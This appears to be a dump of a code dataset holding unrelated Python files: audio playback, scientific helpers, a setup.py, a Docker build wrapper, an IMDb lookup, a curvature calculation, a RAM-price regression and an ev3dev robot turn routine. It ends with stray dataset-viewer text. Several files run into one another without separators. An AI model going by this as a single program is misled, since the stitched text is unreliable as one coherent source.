    """Play the snare sample."""
    playsound("snare.wav", 0)

def hihat():
    """Play the hi-hat sample."""
    playsound("hihat.wav", 0)
# Helper class for prescribed parameters (i.e.
# radial profiles given at t=0)
import numpy as np
from . EquationException import EquationException
class PrescribedScalarParameter:
    """Helper mixin for scalar parameters prescribed as a time series."""

    def _setScalarData(self, data, times=0):
        """
        Normalize prescribed scalar data to a pair of numpy arrays
        (data, times), broadcasting scalar data over the time vector.
        """
        t = np.asarray([times]) if np.isscalar(times) else np.asarray(times)
        if np.isscalar(data):
            d = data * np.ones((t.size, ))
        else:
            d = np.asarray(data)
        return d, t

    def _verifySettingsPrescribedScalarData(self, name, data, times):
        """
        Verify the structure of the prescribed data, raising
        EquationException on any dimension or size mismatch.
        """
        if data.ndim != 1:
            raise EquationException("{}: Invalid number of dimensions in prescribed scalar data. Expected one dimension (times).".format(name))
        if times.ndim != 1:
            raise EquationException("{}: Invalid number of dimensions in radial grid of prescribed scalar data. Expected one dimension.".format(name))
        if data.shape[0] != times.size:
            raise EquationException("{}: Invalid size of prescribed data: {}. Expected {} elements."
                .format(name, data.shape[0], times.size))
#!/usr/bin/env python
"""
Copyright (c) 2020, SunSpec Alliance
All Rights Reserved
"""
# NOTE(review): distutils is deprecated and removed in Python 3.12 —
# consider migrating to setuptools; left unchanged here.
from distutils.core import setup

# Package metadata and layout for the pysunspec2 distribution.
setup(
    name='pysunspec2',
    version='1.0.3',
    description='Python SunSpec Tools',
    author='SunSpec Alliance',
    author_email='support@sunspec.org',
    url='https://sunspec.org/',
    packages=['sunspec2', 'sunspec2.modbus', 'sunspec2.file', 'sunspec2.tests'],
    # Ship the model definitions and the test fixtures with the package.
    package_data={'sunspec2.tests': ['test_data/*'], 'sunspec2': ['models/json/*']},
    python_requires='>=3.5',
    extras_require={
        'serial': ['pyserial'],
        'excel': ['openpyxl'],
        'test': ['pytest'],
    },
)
|
import os
from wsdm.ts.helpers.persons import persons
from definitions import NOMENCLATURES_DIR
from definitions import PERSONS_DIR
if __name__ == '__main__':
    # For every person listed in the nomenclature, check that a per-person
    # text file exists; record the lines of those that are missing.
    persons_path = os.path.join(NOMENCLATURES_DIR, "persons.txt")
    missing_path = os.path.join(NOMENCLATURES_DIR, "missing_persons.txt")
    with open(persons_path, encoding='utf8', mode='r') as fr, \
            open(missing_path, encoding='utf8', mode='w') as fw:
        for line in fr:
            person_name = line.split(' ', 1)[0]
            modified_name = persons.remove_spaces(person_name)
            file_name = os.path.join(PERSONS_DIR, modified_name + '.txt')
            if not os.path.isfile(file_name):
                fw.write(line)
|
import os
import docker
from docker.errors import BuildError
from patchworkdocker.errors import PatchworkDockerError
class DockerBuildError(PatchworkDockerError):
    """
    Docker build error.  Raised when `docker build` fails; the underlying
    docker.errors.BuildError is chained as the cause.
    """
def build_docker_image(image_name: str, context: str, dockerfile: str):
    """
    Builds a Docker image with the given tag from the given Dockerfile in the given context.
    :param image_name: image tag (can optionally include a version tag)
    :param context: context to build the image in (absolute file path)
    :param dockerfile: Dockerfile to build the image from (absolute file path)
    :raises DockerBuildError: raised if an error occurs during the build
    """
    # Both locations must be absolute before we hand them to the daemon.
    for label, location in (("Context", context), ("Dockerfile", dockerfile)):
        if not os.path.isabs(location):
            raise ValueError(f"{label} location must be absolute: {location}")
    try:
        docker.from_env().images.build(path=context, dockerfile=dockerfile, tag=image_name)
    except BuildError as e:
        raise DockerBuildError(f"Error building image: {image_name}") from e
|
import imdb
class Movie(object):
    """A movie identified by its title and release year."""

    def __init__(self, name, year):
        self.name = name
        self.year = year

    def __str__(self):
        return '%s (%s)' % (self.name, self.year)

    @staticmethod
    def create_movie_from_query(query):
        """Look up *query* on IMDb and build a Movie from the top result."""
        imdb_client = imdb.IMDb()
        top_result = imdb_client.search_movie(query, results=1)[0]
        return Movie(name=top_result['title'], year=top_result['year'])
import numpy as np
from math import sqrt, pi
import random
######################### Define Function ########################
def get_angle(input_list):
    """Return the angle of vector (x, y) = input_list in degrees, in [0, 360)."""
    # FIX: the module imports only sqrt and pi from math, so the original
    # `math.atan2(...)` call raised NameError; import the function locally.
    from math import atan2
    angle = atan2(input_list[1], input_list[0])
    if input_list[1] < 0:
        # atan2 returns values in (-pi, pi]; shift negative-y results so the
        # full range is [0, 2*pi) before converting to degrees.
        angle = angle + 2 * pi
    return angle * 180 / pi
def sortline_angle(line):
    """Sort the points of *line* (an (N, 2) array) by their angle around the
    points' centroid, then rotate the ordering at the largest angular gap
    (> 180 degrees) so the sequence does not start inside a discontinuity.

    NOTE(review): points are keyed by angle in a dict, so two points at the
    exact same angle would overwrite each other — confirm inputs make
    angles unique.
    """
    length = len(line[:][:, 0])
    # Centroid of the point set, used as the angular reference point.
    tmp_x = sum(line[:][:, 0])/length
    tmp_y = sum(line[:][:, 1]) / length
    inner_point = [tmp_x, tmp_y]
    linedict = {}
    # Vectors from the centroid to each point, and their angles in degrees.
    linevectors = line - inner_point
    listangle = list(map(get_angle, linevectors))
    for i in range(0, length):
        # line1dict[xline1[i]] = [xline1[i],yline1[i]]
        linedict[listangle[i]] = line[:][i, :]
    # Sorting dict items orders the points by ascending angle.
    linedict_sorted = sorted(linedict.items())
    listangle = sorted(listangle)
    line_sorted = np.empty([0, 2])
    length = len(linedict_sorted)
    for j in range(0, length):
        line_sorted = np.append(line_sorted, [linedict_sorted[j][1]], axis=0)
    # Rotate the ordering at the first angular jump larger than 180 degrees.
    for i in range(0, length - 1):
        theta = abs(listangle[i] - listangle[i + 1])
        if 180 < theta:
            move = line_sorted[:i + 1]
            line_sorted = line_sorted[i + 1:]
            line_sorted = np.append(line_sorted, move, axis=0)
    return line_sorted
########################################################################
############################ Main Function #############################
########################################################################
def calcurvature(lidar):
    """Estimate the curvature radius of a 2-D point curve.

    Samples `iternum` point triples (one near each end of the x-sorted
    curve plus a midpoint), computes each triple's circumradius via the
    law of cosines/sines, and returns the average radius.

    Parameters:
        lidar: pair (x_values, y_values) of equal-length sequences.

    Returns:
        float: mean circumradius of the sampled triples, or float('inf')
        when every sampled triple is (near-)collinear.

    Fixes over the original:
      * coordinates are read from the sorted (x, [x, y]) pairs instead of
        subtracting the raw dict items (list arithmetic -> TypeError);
      * the third sample index `idx + (length - 2*idx)` == `length - idx`
        was out of range for idx == 0; it is now the mirror index;
      * `c` duplicated the p2-p3 distance instead of being the p1-p3 side;
      * the accumulator no longer starts as np.empty((1, 3)), which mixed
        three uninitialized values into the average;
      * degenerate (collinear/coincident) triples are skipped instead of
        raising ZeroDivisionError / math domain errors.
    """
    x = lidar[0]
    y = lidar[1]
    # sort points by x coordinate (points sharing an x value collapse)
    curvedict = {}
    length = len(x)
    for i in range(0, length):
        curvedict[x[i]] = [x[i], y[i]]
    # each dict item is (x, [x, y]); keep only the [x, y] pairs, x-sorted
    points = [pt for _, pt in sorted(curvedict.items())]
    length = len(points)
    iternum = 4
    r_list = []
    for _ in range(iternum):
        # symmetric sample: idx from the front, its mirror from the back,
        # and (approximately) the midpoint between them
        idx = random.randint(0, length // 3)
        p1 = points[idx]
        p2 = points[idx + (length - 2 * idx) // 2]
        p3 = points[length - 1 - idx]
        # triangle side lengths
        a = sqrt((p2[0] - p1[0]) ** 2 + (p2[1] - p1[1]) ** 2)
        b = sqrt((p3[0] - p2[0]) ** 2 + (p3[1] - p2[1]) ** 2)
        c = sqrt((p3[0] - p1[0]) ** 2 + (p3[1] - p1[1]) ** 2)
        if a == 0 or b == 0:
            # coincident sample points: no triangle to measure
            continue
        # cosine of the angle at p2 (law of cosines)
        q = (a ** 2 + b ** 2 - c ** 2) / (2 * a * b)
        sin_sq = 1 - q ** 2
        if sin_sq <= 1e-12:
            # (near-)collinear triple: circumradius is undefined/infinite
            continue
        # law of sines: circumradius = c / (2 * sin(angle at p2))
        r_list.append(c / (2 * sqrt(sin_sq)))
    if not r_list:
        return float('inf')
    return sum(r_list) / len(r_list)
|
# -*- coding: ms949 -*-
import pandas as pd
import matplotlib.pylab as plt
# FIX: `sklearn.tree.tree` is a private module path removed in
# scikit-learn 0.24; import from the public `sklearn.tree` package.
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import LinearRegression
import numpy as np

""" Show data by graph """
ram_prices = pd.read_csv("ram_price.csv")
plt.semilogy(ram_prices.date, ram_prices.price)  # switch the y axis to log scale
plt.xlabel("year")
plt.ylabel("prices ($/Mbyte)")  # FIX: closing parenthesis was missing
plt.show()

""" Prediction of RAM prices """
# split at the year 2000: train on the past, test on the future
data_train = ram_prices[ram_prices.date < 2000]
data_test = ram_prices[ram_prices.date >= 2000]

# use only the date feature to predict the price;
# [:, np.newaxis] lifts the 1-D values into a 2-D (n, 1) design matrix
# (FIX: `Series[:, np.newaxis]` was removed in modern pandas)
X_train = data_train.date.to_numpy()[:, np.newaxis]
# log-scale the target to simplify the date/price relationship
y_train = np.log(data_train.price)

tree = DecisionTreeRegressor().fit(X_train, y_train)
linear_reg = LinearRegression().fit(X_train, y_train)

# predict over the whole period
X_all = ram_prices.date.to_numpy()[:, np.newaxis]
pred_tree = tree.predict(X_all)
pred_lr = linear_reg.predict(X_all)

# undo the log scale of the predictions
price_tree = np.exp(pred_tree)
price_lr = np.exp(pred_lr)

plt.semilogy(data_train.date, data_train.price, label="train data")
# FIX: the original plotted the training data twice; this is the test set
plt.semilogy(data_test.date, data_test.price, label="test data")
plt.semilogy(ram_prices.date, price_tree, label="Tree prediction")
plt.semilogy(ram_prices.date, price_lr, label="Linear regression")
plt.legend()
plt.show()
#!/usr/bin/env python3
from ev3dev2.motor import MoveTank, OUTPUT_B, OUTPUT_C
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.sensor.lego import ColorSensor, GyroSensor, UltrasonicSensor
from sys import stderr
# gyro on input port 1 — reports the robot's heading in degrees via .angle
gyro = GyroSensor(INPUT_1)
# left/right drive motors on output ports B and C, driven as a tank pair
tank_block = MoveTank(OUTPUT_B, OUTPUT_C)
#_________________________________________________________________________________________________________________________________
def Turn_from_start_position(stop, speed, degrees):
    """Rotate the robot in place until the gyro reads *degrees*.

    Spins left or right depending on whether the current gyro angle is
    below or above the target, polls the gyro in a busy loop, and switches
    the motors off once the target is reached or *stop()* returns truthy.

    Parameters:
        stop: zero-argument callable; a truthy return aborts the turn early
        speed: motor speed for the turn (ev3dev2 speed units)
        degrees: target gyro angle in degrees
    """
    print("In Turn_from_start_position", file=stderr)
    current_gyro_reading = gyro.angle
    print("Current Gyro: {}".format (float(current_gyro_reading)), file=stderr)
    if current_gyro_reading < degrees:
        # target is counter-clockwise of the current heading
        tank_block.on(left_speed = -speed, right_speed = speed)
        # Poll until the target is reached or the caller aborts.
        # (The original re-checked the target with an inner `break` that
        # duplicated the while condition; the condition alone suffices.)
        while current_gyro_reading < degrees and not stop():
            current_gyro_reading = gyro.angle
    elif current_gyro_reading > degrees:
        # target is clockwise of the current heading
        tank_block.on(left_speed = speed, right_speed = -speed)
        while current_gyro_reading > degrees and not stop():
            current_gyro_reading = gyro.angle
    # always stop the motors, even if no turn was needed
    tank_block.off()
    print("Leaving Turn_from_start_position", file=stderr)
    print("Current Gyro: {}".format (float(current_gyro_reading)), file=stderr)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.